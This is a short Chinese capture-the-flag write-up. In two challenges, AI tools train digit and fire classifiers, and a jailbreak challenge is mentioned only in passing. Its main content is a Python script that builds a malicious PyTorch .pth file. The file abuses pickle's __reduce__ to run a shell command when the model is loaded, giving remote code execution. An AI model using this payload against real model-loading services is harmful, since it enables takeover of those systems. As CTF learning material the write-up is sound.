目录
[Aura JailBreak](#Aura JailBreak)
[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)
许哥的数字游戏
就是用题目给的数据去训练个模型识别数字
先叫ai解读下附件内容
让ai根据数据集训练个模型
把题目交互方式告诉ai,写个解题脚本拿到flag
🤫歌的😡🔥
附件内容,一个是有火的图,一个是没火的图
还是让ai训练模型&写交互
拿到flag
Aura JailBreak
明阳未许
一样是ai秒了
🔥🌸 LittFlower: Fire Boom! 🌸🔥
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os
class MaliciousMobileNetV2(models.MobileNetV2):
def __init__(self, num_classes=2):
super().__init__(num_classes=num_classes)
def __reduce__(self):
state_dict = self.state_dict()
fake_state_dict = state_dict.copy()
if "classifier.1.weight" in fake_state_dict:
del fake_state_dict["classifier.1.weight"]
if "classifier.1.bias" in fake_state_dict:
del fake_state_dict["classifier.1.bias"]
cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
return (builtins.eval, (
"(exec(cmd), state_dict)[1]",
{'cmd': cmd, 'state_dict': fake_state_dict}
))
if __name__ == '__main__':
model = MaliciousMobileNetV2(num_classes=2)
save_path = 'evil.pth'
print(f"正在生成 Payload: {save_path} ...")
torch.save(model, save_path)
print("生成成功!")上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag
